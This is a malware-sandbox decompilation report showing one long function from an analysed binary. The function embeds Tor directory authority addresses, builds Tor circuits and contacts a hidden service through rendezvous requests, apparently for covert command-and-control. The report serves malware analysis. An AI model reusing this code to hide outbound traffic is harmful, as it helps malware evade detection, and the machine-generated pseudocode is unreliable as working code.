                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_40b000_p9CvI6kq7d.jbxd
                            Similarity
                            • API ID: AllocLocal
                            • String ID:
                            • API String ID: 3494564517-0
                            • Opcode ID: 470717b38cc2fd8a0c4a920ed5304e860ed77dd3bdd7a7dc4029013d3fd65535
                            • Instruction ID: c8baa8bde7583ad4131d7c334ac4cb7a68e75236fe6cbe664849887b5b190d9e
                            • Opcode Fuzzy Hash: 470717b38cc2fd8a0c4a920ed5304e860ed77dd3bdd7a7dc4029013d3fd65535
                            • Instruction Fuzzy Hash: 22B012B4005100CBD7005FA2ED047843E70A3C9303F004031E30880174C77050009F28
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 86%
                            			E00401168(signed int __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                            				long* _v8;
                            				char _v12;
                            				char _v16;
                            				char _v20;
                            				char _v24;
                            				int _v28;
                            				int _v32;
                            				int _v36;
                            				int _v40;
                            				signed int _v44;
                            				int _v48;
                            				signed int _v52;
                            				int _v56;
                            				void* _v184;
                            				char _v312;
                            				char _v440;
                            				int _v444;
                            				intOrPtr _v448;
                            				intOrPtr _v452;
                            				short _v454;
                            				char _v455;
                            				char _v456;
                            				char _v460;
                            				char _v464;
                            				char _v468;
                            				char _v472;
                            				char _v476;
                            				char _v480;
                            				char _v484;
                            				char _v488;
                            				char _v492;
                            				char _v496;
                            				char _v500;
                            				char _v504;
                            				char _v508;
                            				char _v512;
                            				char _v516;
                            				char _v520;
                            				char _v524;
                            				intOrPtr _v528;
                            				intOrPtr _v532;
                            				char _v540;
                            				intOrPtr _v544;
                            				intOrPtr _v548;
                            				char _v556;
                            				intOrPtr _v560;
                            				intOrPtr _v564;
                            				char _v572;
                            				signed int _v576;
                            				char _v881;
                            				char _v901;
                            				char _v1000;
                            				char _v1041;
                            				signed int _v1042;
                            				signed int _v1043;
                            				char _v1063;
                            				char _v1064;
                            				char _v1065;
                            				intOrPtr _v1069;
                            				char _v1070;
                            				char _v1086;
                            				char _v1284;
                            				intOrPtr _v1288;
                            				int _v1292;
                            				int _v1296;
                            				char _v1300;
                            				int _v1304;
                            				int _v1308;
                            				char _v1312;
                            				char _v1313;
                            				intOrPtr _v1444;
                            				char _v1445;
                            				char _v1460;
                            				char _v1545;
                            				char _v1565;
                            				char _v1566;
                            				signed int _v1570;
                            				char _v1590;
                            				char _v1600;
                            				intOrPtr _v1616;
                            				char _v1620;
                            				intOrPtr _v1624;
                            				CHAR* _v1628;
                            				intOrPtr _v1632;
                            				CHAR* _v1636;
                            				intOrPtr _v1640;
                            				CHAR* _v1644;
                            				intOrPtr _v1648;
                            				CHAR* _v1652;
                            				intOrPtr _v1656;
                            				CHAR* _v1660;
                            				intOrPtr _v1664;
                            				CHAR* _v1668;
                            				intOrPtr _v1672;
                            				CHAR* _v1676;
                            				intOrPtr _v1680;
                            				CHAR* _v1684;
                            				intOrPtr _v1688;
                            				CHAR* _v1692;
                            				char _v1696;
                            				int _v1700;
                            				int _v1704;
                            				signed int _v1708;
                            				char _v1740;
                            				char* _v1748;
                            				char* _v1752;
                            				intOrPtr _v1760;
                            				intOrPtr _v1764;
                            				char _v1768;
                            				intOrPtr _v1772;
                            				intOrPtr _v1776;
                            				intOrPtr _v1780;
                            				intOrPtr _v1784;
                            				char _v1788;
                            				intOrPtr _v1792;
                            				intOrPtr _v1800;
                            				char _v1808;
                            				signed int _v1816;
                            				char _v1828;
                            				int _v1880;
                            				int _v1884;
                            				char _v1888;
                            				void* _v1892;
                            				int _v1896;
                            				char _v1904;
                            				char _v1916;
                            				char* _v1920;
                            				char _v1924;
                            				BYTE* _v1928;
                            				int _v1932;
                            				signed int _t689;
                            				signed int _t698;
                            				signed int _t703;
                            				signed int _t705;
                            				signed int _t709;
                            				int _t711;
                            				signed int _t717;
                            				signed int _t724;
                            				intOrPtr _t729;
                            				signed int _t735;
                            				char _t736;
                            				signed int _t743;
                            				signed int _t770;
                            				signed int _t775;
                            				signed int _t795;
                            				signed int _t797;
                            				int _t803;
                            				signed int _t804;
                            				signed int _t812;
                            				signed int _t815;
                            				signed int _t819;
                            				signed int _t820;
                            				signed int _t825;
                            				intOrPtr _t833;
                            				void* _t835;
                            				signed int _t839;
                            				signed int _t847;
                            				signed int _t866;
                            				signed int _t868;
                            				intOrPtr _t883;
                            				char _t884;
                            				signed int _t892;
                            				signed int _t904;
                            				signed int _t962;
                            				signed int _t964;
                            				signed int _t966;
                            				signed int _t976;
                            				signed int _t978;
                            				signed int _t979;
                            				signed int _t980;
                            				signed int _t981;
                            				void* _t983;
                            				signed int _t984;
                            				signed int _t986;
                            				signed int _t987;
                            				void* _t989;
                            				signed int _t990;
                            				int _t998;
                            				signed int _t1003;
                            				signed int _t1007;
                            				intOrPtr _t1011;
                            				void* _t1014;
                            				char* _t1020;
                            				char* _t1026;
                            				void* _t1028;
                            				char* _t1030;
                            				char* _t1031;
                            				char* _t1032;
                            				char* _t1033;
                            				char* _t1034;
                            				char _t1035;
                            				char* _t1036;
                            				BYTE* _t1037;
                            				char* _t1038;
                            				char* _t1039;
                            				char* _t1043;
                            				char* _t1044;
                            				char* _t1045;
                            				void* _t1046;
                            				intOrPtr* _t1047;
                            				char _t1050;
                            				void* _t1051;
                            				void* _t1052;
                            
                            				_t1017 = __edx;
                            				E004066D2( &_v1932,  &_v16 - _t1052);
                            				CryptAcquireContextA( &_v8, 0, "Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider", 0xd, 0xf0000000);
                            				_push(0);
                            				_push(0);
                            				_push(L"SHA1");
                            				_push( &_v12);
                            				 *((intOrPtr*)(E00406EE2( &_v16 - _t1052, E00406DF2("bcrypt.dll"), "BCryptOpenAlgorithmProvider")))();
                            				_push(0);
                            				_push(0);
                            				_push(L"RSA");
                            				_push( &_v16);
                            				 *((intOrPtr*)(E00406EE2( &_v16 - _t1052, E00406DF2("bcrypt.dll"), "BCryptOpenAlgorithmProvider")))();
                            				_push(0);
                            				_push(0);
                            				_push(L"AES");
                            				_push( &_v20);
                            				 *((intOrPtr*)(E00406EE2( &_v16 - _t1052, E00406DF2("bcrypt.dll"), "BCryptOpenAlgorithmProvider")))();
                            				_push(0);
                            				_push(0x20);
                            				_push(L"ChainingModeECB");
                            				_push(L"ChainingMode");
                            				_push(_v20);
                            				_t660 =  *((intOrPtr*)(E00406EE2( &_v16 - _t1052, E00406DF2("bcrypt.dll"), "BCryptSetProperty")))();
                            				_v1896 = 0;
                            				_v1932 = 0;
                            				_v1692 = "193.23.244.244";
                            				_v1688 = 0x50;
                            				_v1684 = "86.59.21.38";
                            				_v1680 = 0x50;
                            				_v1676 = "199.58.81.140";
                            				_v1672 = 0x50;
                            				_v1668 = "204.13.164.118";
                            				_v1664 = 0x50;
                            				_v1660 = "194.109.206.212";
                            				_v1656 = 0x50;
                            				_v1652 = "131.188.40.189";
                            				_v1648 = 0x50;
                            				_v1644 = "154.35.175.225";
                            				_v1640 = 0x50;
                            				_v1636 = "171.25.193.9";
                            				_v1632 = 0x1bb;
                            				_v1628 = "128.31.0.34";
                            				_v1624 = 0x23ab;
                            				_v1620 = "128.31.0.39";
                            				_v1616 = 0x23ab;
                            				_v1696 = 5;
                            				while(1) {
                            					_t31 =  &_v1696;
                            					 *_t31 = _v1696 - 1;
                            					_t1054 =  *_t31;
                            					if( *_t31 < 0) {
                            						break;
                            					}
                            					E00406A32(_t660, 0xa);
                            					_t660 = E00402A45(_t1017, _t1054,  *[ss:ecx+ebp-0x698],  *[ss:ecx+ebp-0x694], "/tor/status-vote/current/consensus",  &_v576);
                            					_t1055 = _t660;
                            					if(_t660 == 0) {
                            						continue;
                            					}
                            					_v40 = _t660;
                            					_t689 = E004069DA(_t1055, _v576, _v40, "directory-footer");
                            					_t660 = _t689;
                            					if(_t689 == 0) {
                            						continue;
                            					} else {
                            						_t1017 = _v576;
                            						_t660 = E004066D2(_t660 - _v576 + _v576, _v40 - _t660 - _v576);
                            						_v1700 = 0;
                            						_v1704 = 0;
                            						_t1026 = _v576;
                            						do {
                            							if(_v40 > 3 &&  *_t1026 == 0xa &&  *((char*)(_t1026 + 1)) == 0x72 &&  *((char*)(_t1026 + 2)) == 0x20) {
                            								_v1700 = _v1700 + 1;
                            								_t987 = E00403FA5(_t1026);
                            								_t660 = _t987 & 0x00000008;
                            								if((_t987 & 0x00000008) != 0) {
                            									_v1704 = _v1704 + 1;
                            								}
                            							}
                            							_t1026 = _t1026 + 1;
                            							_t51 =  &_v40;
                            							 *_t51 = _v40 - 1;
                            						} while ( *_t51 != 0);
                            						if(_v1700 > 0x3e8) {
                            							_v1708 = 0;
                            							while(1) {
                            								__eflags = _v1708 - 4;
                            								if(_v1708 > 4) {
                            									goto L133;
                            								}
                            								_t1027 = E00403F5D(_v576, E00406A32(_t660, _v1700), 0);
                            								_t660 = E00403FA5(_t693);
                            								__eflags = _v1708;
                            								if(_v1708 != 0) {
                            									L17:
                            									__eflags = _v1708 - 1;
                            									if(_v1708 != 1) {
                            										L19:
                            										__eflags = _v1708 - 2;
                            										if(_v1708 != 2) {
                            											L21:
                            											__eflags = _v1708 - 4;
                            											if(__eflags != 0) {
                            												L23:
                            												_t698 = E00403EA6(__eflags, _t1027, _t1051 + _v1708 * 4 - 0x6dc, _t1051 + _v1708 * 4 - 0x6f0, _t1051 + _v1708 * 4 - 0x704, _t1051 + _v1708 * 4 - 0x718);
                            												_t660 = _t698;
                            												__eflags = _t698;
                            												if(_t698 != 0) {
                            													continue;
                            												}
                            												__eflags = _v1708 - 1;
                            												if(_v1708 != 1) {
                            													L26:
                            													__eflags = _v1708 - 4;
                            													if(__eflags != 0) {
                            														__eflags = _v1708 - 3;
                            														if(_v1708 != 3) {
                            															__eflags = _v1708 - 2;
                            															if(__eflags != 0) {
                            																__eflags = _v1708;
                            																if(__eflags != 0) {
                            																	L130:
                            																	_v1708 = _v1708 + 1;
                            																	continue;
                            																}
                            																__eflags = E00402FB6(_t1017, __eflags, _v1780, _v1800, _a12, _a16,  &_v1896);
                            																if(__eflags == 0) {
                            																	L131:
                            																	_t660 = E00406474(_a12, _a16, _v1896);
                            																	_v1708 = 0;
                            																	continue;
                            																}
                            																E00404484(__eflags, _v1896, 0x4092a0, 7, 0, _a12);
                            																_v1892 = 0;
                            																_t703 = E004048B6(0x186a0,  &_v1920);
                            																__eflags = _t703;
                            																if(_t703 == 0) {
                            																	goto L131;
                            																}
                            																_t705 = E004048B6(0x186a0,  &_v1924);
                            																__eflags = _t705;
                            																if(_t705 == 0) {
                            																	goto L131;
                            																}
                            																_t1028 = _v1920;
                            																_v40 = 0;
                            																_v48 = 0;
                            																while(1) {
                            																	E00406698(_v1896, 0,  &_v1916, 0xa, 0);
                            																	_push( &_v1904);
                            																	_push(0);
                            																	_push(0);
                            																	_t709 =  &_v1916;
                            																	_push(_t709);
                            																	_push(0);
                            																	L0040717E();
                            																	__eflags = _t709;
                            																	if(__eflags <= 0) {
                            																		goto L131;
                            																	}
                            																	_t711 = E004045B9(__eflags, _v1896,  &_v1892, _a12);
                            																	__eflags = _t711;
                            																	if(_t711 <= 0) {
                            																		goto L131;
                            																	}
                            																	_v40 = _v40 + _t711;
                            																	_t1046 = _v1892;
                            																	_t998 = _t711;
                            																	memcpy(_t1028, _t1046, _t998);
                            																	_t1052 = _t1052 + 0xc;
                            																	_t1028 = _t1046 + _t998 + _t998;
                            																	E004048E1( &_v1892);
                            																	__eflags = _v40 - 0x202;
                            																	if(_v40 < 0x202) {
                            																		continue;
                            																	}
                            																	_t1017 = _v1920;
                            																	_t717 =  *(_t1017 + 0x10) & 0x0000ffff;
                            																	__eflags = _t717 + 0x19 - _v40;
                            																	if(_t717 + 0x19 > _v40) {
                            																		continue;
                            																	}
                            																	_t1003 =  *(_t717 + _t1017 + 0x17) & 0x0000ffff;
                            																	__eflags = _v40 - _t1003 + _t717 + 0x21b;
                            																	if(_v40 != _t1003 + _t717 + 0x21b) {
                            																		continue;
                            																	}
                            																	E004066E9(_a4, 0xa,  &_v1600);
                            																	asm("bswap eax");
                            																	_t724 =  *((intOrPtr*)(_t1028 - 0x1fd)) + (_v1600 & 0x000000ff) * 0x15180 / 0x100;
                            																	_t1017 = _t724 % 0x15180;
                            																	asm("bswap eax");
                            																	_v1570 = _t724 / 0x15180;
                            																	E004066D2(_v1924, 0x186a0);
                            																	_t1050 = _v1924;
                            																	 *((char*)(_t1050 + 4)) = 8;
                            																	_t729 = E0040664B(_t1028 - 0x1fd, _t1050 + 5, 4);
                            																	 *((short*)(_t1050 + 9)) = 0x404;
                            																	_push(_v1780);
                            																	L00407166();
                            																	 *((intOrPtr*)(_t1050 + 0xb)) = _t729;
                            																	 *((intOrPtr*)(_t1050 + 0xf)) = 0x40401;
                            																	_t660 = E00404484(__eflags, _v1896, _t1050, 0x202, 0, _a12);
                            																	goto L130;
                            																}
                            																goto L131;
                            															}
                            															_t735 = E00403422(__eflags, _v12, _v8, _v16, _v20, _a12, _v1896, _v1776, _v1816, _v1772, _v1792, _v1760, _v1752, 1,  &_v516,  &_v512,  &_v508,  &_v504,  &_v572);
                            															__eflags = _t735;
                            															if(_t735 <= 0) {
                            																goto L131;
                            															}
                            															_t736 = E004066D2(_v1924, 0x186a0);
                            															_t1030 = _v1924;
                            															 *_t1030 = 0x80;
                            															 *((char*)(_t1030 + 3)) = 1;
                            															 *((char*)(_t1030 + 4)) = 3;
                            															 *((char*)(_t1030 + 5)) = 0x21;
                            															 *((char*)(_t1030 + 0xf)) = 0x14;
                            															_t1007 = 0;
                            															while(1) {
                            																__eflags = _t1007 - 0x14;
                            																if(_t1007 >= 0x14) {
                            																	break;
                            																}
                            																 *[ss:ecx+ebp-0x650] = _t736;
                            																_t1007 = _t1007 + 1;
                            																__eflags = _t1007;
                            															}
                            															E0040664B( &_v1620, _t1030 + 0x10, 0x14);
                            															E00403892(_t1017, _v12, _v516, _v508, 0, _t1030 + 5, 0, _v564);
                            															E00404484(__eflags, _v1896, _v1924, 0x202, 0, _a12);
                            															_t743 = E004047B4(_v1896, _v1920, 0x202, _a12, 0x14);
                            															_t1031 = _v1920;
                            															__eflags = _t743;
                            															if(_t743 != 0) {
                            																goto L131;
                            															}
                            															__eflags =  *((char*)(_t1031 + 4)) - 3;
                            															if(__eflags != 0) {
                            																goto L131;
                            															}
                            															_t660 = E00403913(_t1017, __eflags, _v12, _v512, _v504, 0, _t1031 + 5, 1, _v560);
                            															__eflags = _t660;
                            															if(_t660 == 0) {
                            																goto L131;
                            															}
                            															__eflags =  *((intOrPtr*)(_t1031 + 5)) - 0x27;
                            															if( *((intOrPtr*)(_t1031 + 5)) != 0x27) {
                            																goto L131;
                            															}
                            															goto L130;
                            														}
                            														_v56 = 0;
                            														_v24 = 2;
                            														_v28 = 1;
                            														while(1) {
                            															__eflags = _v56 - 2;
                            															if(_v56 >= 2) {
                            																break;
                            															}
                            															_v1566 = _v56;
                            															E0040332E(_v12,  &_v1570, 5,  &_v1590, 0, 0xffffffff);
                            															E0040332E(_v12,  &_v1600, 0x1e,  &_v1565, 0, 0xffffffff);
                            															E004067E1( &_v1565, 0x14,  &_v1545);
                            															E0040664B( &_v1704,  &_v40, 4);
                            															E0040664B( &_v1704,  &_v48, 4);
                            															_t989 = 0;
                            															while(1) {
                            																__eflags = _v48;
                            																if(_v48 <= 0) {
                            																	break;
                            																}
                            																E0040664B( &_v48,  &_v40, 4);
                            																_v40 = _v40 >> 1;
                            																_t770 = E00403EA6(__eflags, E00403F5D(_v576, _t989 + _v40, 8),  &_v1748,  &_v1768,  &_v1788,  &_v1808);
                            																_v36 = 0;
                            																__eflags = _t770;
                            																if(_t770 != 0) {
                            																	L76:
                            																	__eflags = _v36 - 1;
                            																	if(_v36 != 1) {
                            																		E0040664B( &_v40,  &_v48, 4);
                            																	} else {
                            																		_t989 = _t989 + _v40 + 1;
                            																		_v48 = _v48 - _v40 + 1;
                            																	}
                            																	continue;
                            																}
                            																CryptStringToBinaryA(_v1748, 0, 1, 0,  &_v32, 0, 0);
                            																CryptStringToBinaryA(_v1748, 0, 1,  &_v1445,  &_v32, 0, 0);
                            																_t1014 = 0;
                            																while(1) {
                            																	__eflags = _t1014 - 0x14;
                            																	if(_t1014 >= 0x14) {
                            																		goto L76;
                            																	}
                            																	_t833 =  *[ss:ecx+ebp-0x5a1];
                            																	__eflags = _t833 -  *[ss:ecx+ebp-0x619];
                            																	if(_t833 >  *[ss:ecx+ebp-0x619]) {
                            																		goto L76;
                            																	}
                            																	__eflags = _t833 -  *[ss:ecx+ebp-0x619];
                            																	if(_t833 !=  *[ss:ecx+ebp-0x619]) {
                            																		_v36 = 1;
                            																	}
                            																	_t1014 = _t1014 + 1;
                            																}
                            																goto L76;
                            															}
                            															_v32 = 0;
                            															while(1) {
                            																__eflags = _v32 - 3;
                            																if(_v32 >= 3) {
                            																	break;
                            																}
                            																_t775 = E00403F5D(_v576, _t989, 8);
                            																_t989 = _t989 + 1;
                            																_t1017 = _t775;
                            																__eflags = E00403EA6(__eflags, _t775,  &_v1748,  &_v1768,  &_v1788,  &_v1808);
                            																if(__eflags != 0) {
                            																	continue;
                            																}
                            																__eflags = E00403422(__eflags, _v12, _v8, _v16, _v20, _a12, _v1896, _v1776, _v1816, _v1768, _v1788, _v1760, _v1748, _v24,  &_v500,  &_v496,  &_v492,  &_v488,  &_v556);
                            																if(__eflags <= 0) {
                            																	L102:
                            																	E00403779(_v1896, _v1920, _a12, _v24);
                            																	_v24 = _v24 + 1;
                            																	_v28 = _v28 + 1;
                            																	_v32 = _v32 + 1;
                            																	_t660 = E004069DA(__eflags, _v1924, 0x186a0, "-----END MESSAGE-----");
                            																	__eflags = _t660;
                            																	if(_t660 != 0) {
                            																		_v52 = _t660;
                            																		goto L130;
                            																	}
                            																	continue;
                            																}
                            																E004066D2(_v1924, 0x186a0);
                            																_t1032 = _v1924;
                            																 *_t1032 = 0x80;
                            																 *((char*)(_t1032 + 3)) = _v24;
                            																 *((char*)(_t1032 + 4)) = 3;
                            																 *((char*)(_t1032 + 5)) = 0xd;
                            																 *((char*)(_t1032 + 9)) = _v28;
                            																E00403892(_t1017, _v12, _v500, _v492, 0, _t1032 + 5, 0, _v548);
                            																E00404484(__eflags, _v1896, _v1924, 0x202, 0, _a12);
                            																_t795 = E004047B4(_v1896, _v1920, 0x202, _a12, 0x14);
                            																_t1033 = _v1920;
                            																__eflags = _t795;
                            																if(_t795 != 0) {
                            																	goto L131;
                            																}
                            																__eflags =  *((char*)(_t1033 + 4)) - 3;
                            																if(__eflags != 0) {
                            																	goto L102;
                            																}
                            																_t797 = E00403913(_t1017, __eflags, _v12, _v496, _v488, 0, _t1033 + 5, 1, _v544);
                            																__eflags = _t797;
                            																if(_t797 == 0) {
                            																	goto L131;
                            																}
                            																__eflags =  *((intOrPtr*)(_t1033 + 5)) - 4;
                            																if(__eflags != 0) {
                            																	goto L102;
                            																}
                            																E004066D2(_v1924, 0x186a0);
                            																_t1034 = _v1924;
                            																 *_t1034 = 0x80;
                            																 *((char*)(_t1034 + 3)) = _v24;
                            																 *((char*)(_t1034 + 4)) = 3;
                            																 *((char*)(_t1034 + 5)) = 2;
                            																 *((char*)(_t1034 + 9)) = _v28;
                            																_t803 = wsprintfA(_t1034 + 0x10, "GET /tor/rendezvous2/%s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\n\r\n",  &_v1545, _v1768);
                            																_t1052 = _t1052 + 0x10;
                            																_t804 = _t803 + 1;
                            																__eflags = _t804;
                            																 *(_t1034 + 0xf) = _t804;
                            																E00403892(_t1017, _v12, _v500, _v492, 0, _t1034 + 5, 1, _v548);
                            																E00404484(__eflags, _v1896, _v1924, 0x202, 0, _a12);
                            																_v40 = 0;
                            																_v48 = 2;
                            																_v52 = 0;
                            																_t1047 = _v1920;
                            																_t1035 = _v1924;
                            																E004066D2(_v1924, 0x186a0);
                            																while(1) {
                            																	E00406698(_v1896, 0,  &_v1916, 0xa, 0);
                            																	_push( &_v1904);
                            																	_push(0);
                            																	_push(0);
                            																	_t812 =  &_v1916;
                            																	_push(_t812);
                            																	_push(0);
                            																	L0040717E();
                            																	__eflags = _t812;
                            																	if(_t812 < 0) {
                            																		goto L131;
                            																	}
                            																	__eflags = _t812;
                            																	if(__eflags == 0) {
                            																		goto L102;
                            																	}
                            																	_t815 = E004045B9(__eflags, _v1896,  &_v1892, _a12);
                            																	__eflags = _t815;
                            																	if(_t815 <= 0) {
                            																		goto L131;
                            																	}
                            																	_t1020 =  &(_v1920[_v40]);
                            																	_v40 = _v40 + _t815;
                            																	__eflags = _v40 - 0x186a0;
                            																	if(_v40 > 0x186a0) {
                            																		goto L133;
                            																	}
                            																	E0040664B(_v1892, _t1020, _t815);
                            																	E004048E1( &_v1892);
                            																	_t819 = _v40;
                            																	_t820 = _t819 / 0x202;
                            																	_t1017 = _t819 % 0x202;
                            																	__eflags = _t819 % 0x202;
                            																	if(_t819 % 0x202 != 0) {
                            																		continue;
                            																	}
                            																	_v44 = _t820;
                            																	while(1) {
                            																		__eflags = _v44;
                            																		if(_v44 <= 0) {
                            																			break;
                            																		}
                            																		__eflags =  *_t1047 - 0x80;
                            																		if(__eflags != 0) {
                            																			L99:
                            																			_t1047 = _t1047 + 0x202;
                            																			_t480 =  &_v44;
                            																			 *_t480 = _v44 - 1;
                            																			__eflags =  *_t480;
                            																			continue;
                            																		}
                            																		_t825 = E00403913(_t1017, __eflags, _v12, _v496, _v488, 0, _t1047 + 5, _v48, _v544);
                            																		__eflags = _t825;
                            																		if(_t825 == 0) {
                            																			goto L131;
                            																		}
                            																		__eflags =  *((short*)(_t1047 + 4)) - 0x503;
                            																		if( *((short*)(_t1047 + 4)) == 0x503) {
                            																			goto L99;
                            																		}
                            																		__eflags =  *((short*)(_t1047 + 4)) - 0x203;
                            																		if(__eflags != 0) {
                            																			goto L102;
                            																		}
                            																		_t1011 =  *((intOrPtr*)(_t1047 + 0xe));
                            																		E0040664B(_t1047 + 0x10, _t1035, _t1011);
                            																		_t1035 = _t1035 + _t1011;
                            																		_t478 =  &_v48;
                            																		 *_t478 = _v48 + 1;
                            																		__eflags =  *_t478;
                            																		goto L99;
                            																	}
                            																}
                            																goto L131;
                            															}
                            															_t495 =  &_v56;
                            															 *_t495 = _v56 + 1;
                            															__eflags =  *_t495;
                            														}
                            														goto L133;
                            													}
                            													_t835 = E004069DA(__eflags, _v1924, 0x186a0, "-----BEGIN MESSAGE-----") + 0x17;
                            													_v52 = _v52 - _t835;
                            													_t1036 = _v1920;
                            													while(1) {
                            														__eflags = _v52;
                            														if(_v52 <= 0) {
                            															break;
                            														}
                            														asm("lodsb");
                            														__eflags = _t835 - 0x20;
                            														if(_t835 > 0x20) {
                            															asm("stosb");
                            														}
                            														_t81 =  &_v52;
                            														 *_t81 = _v52 - 1;
                            														__eflags =  *_t81;
                            													}
                            													 *_t1036 = 0;
                            													CryptStringToBinaryA(_v1920, 0, 1, 0,  &_v32, 0, 0);
                            													_t839 = E004048B6(_v32,  &_v1928);
                            													__eflags = _t839;
                            													if(_t839 == 0) {
                            														goto L133;
                            													}
                            													CryptStringToBinaryA(_v1920, 0, 1, _v1928,  &_v32, 0, 0);
                            													_t1037 = _v1928;
                            													_t990 = 0;
                            													while(1) {
                            														__eflags = _t990 - 3;
                            														if(_t990 >= 3) {
                            															break;
                            														}
                            														__eflags = _v32;
                            														if(__eflags > 0) {
                            															_t978 = E004069A0(__eflags, _t1037, _v32, "introduction-point");
                            															__eflags = _t978;
                            															if(__eflags == 0) {
                            																break;
                            															}
                            															 *(_t1051 + _t990 * 4 - 0x72c) = _t978;
                            															_t979 = E004069A0(__eflags, _t1037, _v32, "ip-address");
                            															__eflags = _t979;
                            															if(__eflags == 0) {
                            																goto L133;
                            															}
                            															 *(_t1051 + _t990 * 4 - 0x738) = _t979;
                            															_t980 = E004069A0(__eflags, _t1037, _v32, "onion-port");
                            															__eflags = _t980;
                            															if(__eflags == 0) {
                            																goto L133;
                            															}
                            															 *(_t1051 + _t990 * 4 - 0x744) = _t980;
                            															_t981 = E004069DA(__eflags, _t1037, _v32, "service-key");
                            															__eflags = _t981;
                            															if(__eflags == 0) {
                            																goto L133;
                            															}
                            															_t983 = _t981 + 1 - _t1037;
                            															_t1037 =  &(_t1037[_t983]);
                            															_v32 = _v32 - _t983;
                            															_t984 = E004069DA(__eflags, _t1037, _v32, "KEY-----");
                            															__eflags = _t984;
                            															if(__eflags == 0) {
                            																goto L133;
                            															}
                            															 *((intOrPtr*)(_t1051 + _t990 * 4 - 0x750)) = _t984 + 8;
                            															_t986 = E004069DA(__eflags, _t1037, _v32, "-----END");
                            															__eflags = _t986;
                            															if(_t986 == 0) {
                            																goto L133;
                            															}
                            															 *_t986 = 0;
                            															_t990 = _t990 + 1;
                            															__eflags = _t990;
                            															continue;
                            														}
                            														break;
                            													}
                            													while(1) {
                            														__eflags = _t990;
                            														if(__eflags <= 0) {
                            															break;
                            														}
                            														_t990 = _t990 - 1;
                            														_t847 = E00403422(__eflags, _v12, _v8, _v16, _v20, _a12, _v1896, _v1776, _v1816,  *(_t1051 + _t990 * 4 - 0x738),  *(_t1051 + _t990 * 4 - 0x744), _v1760,  *(_t1051 + _t990 * 4 - 0x72c), _v24,  &_v484,  &_v480,  &_v476,  &_v472,  &_v540);
                            														__eflags = _t847;
                            														if(_t847 <= 0) {
                            															L57:
                            															E00403779(_v1896, _v1920, _a12, _v24);
                            															_t271 =  &_v24;
                            															 *_t271 = _v24 + 1;
                            															__eflags =  *_t271;
                            															continue;
                            														}
                            														_t883 = E00406A32(E004066D2( &_v1600, 0x400), 0x100);
                            														asm("stosb");
                            														asm("loop 0xfffffff5");
                            														_v1070 = 2;
                            														_push(_v1764);
                            														L00407166();
                            														_v1069 = _t883;
                            														_t884 = E00406663(_v1784);
                            														_v1065 = _t884;
                            														_v1064 = _t884;
                            														CryptStringToBinaryA(_v1752, 0, 1, 0,  &_v40, 0, 0);
                            														CryptStringToBinaryA(_v1752, 0, 1,  &_v1063,  &_v40, 0, 0);
                            														_t892 = E00404065(_t1017, __eflags, _v1776, _v1816,  &_v1063,  &_v1041);
                            														__eflags = _t892;
                            														if(_t892 == 0) {
                            															goto L131;
                            														}
                            														_v1043 = _t892;
                            														_v1042 = _t892;
                            														E0040664B( &_v1620,  &_v901, 0x14);
                            														_v456 = 7;
                            														_v455 = 2;
                            														_v454 = 0;
                            														_v452 = 0xaa02;
                            														_v448 = 0x32484400;
                            														_v444 = 0x400;
                            														E00406A32(E0040664B(0x409450,  &_v440, 0x80), 0x100);
                            														asm("stosb");
                            														asm("loop 0xfffffff5");
                            														E004066D2( &_v312, 0x80);
                            														_v312 = 2;
                            														E00403E30(_v8,  &_v456,  &_v881);
                            														_t1043 =  &_v1460;
                            														_t904 = 1;
                            														while(1) {
                            															_t904 = _t904;
                            															__eflags = _t904;
                            															if(_t904 == 0) {
                            																break;
                            															}
                            															asm("lodsb");
                            															__eflags = _t904 - 0x20;
                            															if(_t904 > 0x20) {
                            																asm("stosb");
                            															}
                            														}
                            														 *_t1043 = 0;
                            														CryptStringToBinaryA( &_v1460, 0, 1, 0,  &_v36, 0, 0);
                            														CryptStringToBinaryA( &_v1460, 0, 1,  &_v1600,  &_v36, 0, 0);
                            														_v40 = 0x94;
                            														E004066D2( &_v1460, 0x94);
                            														_push( &_v40);
                            														_push( &_v1460);
                            														_push(0);
                            														_push(0x8c);
                            														_push( &_v1600);
                            														_push(0x13);
                            														_push(1);
                            														L00407208();
                            														_v1312 = 0x31415352;
                            														_v1308 = 0x400;
                            														_v1304 = 4;
                            														_v1300 = 0x80;
                            														_v1296 = 0;
                            														_v1292 = 0;
                            														asm("bswap eax");
                            														_v1288 = _v1444;
                            														E00406605( &_v1313,  &_v1284, 0x80);
                            														_push(0);
                            														_push(0x9c);
                            														_push( &_v1312);
                            														_push( &_v460);
                            														_push(L"RSAPUBLICBLOB");
                            														_push(0);
                            														_push(_v16);
                            														 *((intOrPtr*)(E00406EE2(__eflags, E00406DF2("bcrypt.dll"), "BCryptImportKeyPair")))();
                            														E004066D2(_v1924, 0x186a0);
                            														_t1044 = _v1924;
                            														 *_t1044 = 0x80;
                            														 *((char*)(_t1044 + 3)) = _v24;
                            														 *((char*)(_t1044 + 4)) = 3;
                            														 *((char*)(_t1044 + 5)) = 0x22;
                            														 *((char*)(_t1044 + 0xe)) = 0x18b;
                            														 *((char*)(_t1044 + 0xf)) = 0x18b;
                            														E0040332E(_v12,  &_v1600, 0x8c, _t1044 + 0x10, 0, 0xffffffff);
                            														_v1888 = L"SHA1";
                            														_v1884 = 0;
                            														_v1880 = 0;
                            														_push(4);
                            														_push( &_v48);
                            														_push(0x80);
                            														_push(_t1044 + 0x24);
                            														_push(0);
                            														_push(0);
                            														_push( &_v1888);
                            														_push(0x56);
                            														_push( &_v1086);
                            														_push(_v460);
                            														 *((intOrPtr*)(E00406EE2(__eflags, E00406DF2("bcrypt.dll"), "BCryptEncrypt")))();
                            														E004064D6( &_v460,  &_v460, 0, 1);
                            														_v1312 = 0x4d42444b;
                            														_v1308 = 1;
                            														_v1304 = 0x10;
                            														E0040664B( &_v1086,  &_v1300, 0x10);
                            														_push(0);
                            														_push(0x1c);
                            														_push( &_v1312);
                            														_push(0);
                            														_push(0);
                            														_push( &_v460);
                            														_push(L"KeyDataBlob");
                            														_push(0);
                            														_push(_v20);
                            														 *((intOrPtr*)(E00406EE2(__eflags, E00406DF2("bcrypt.dll"), "BCryptImportKey")))();
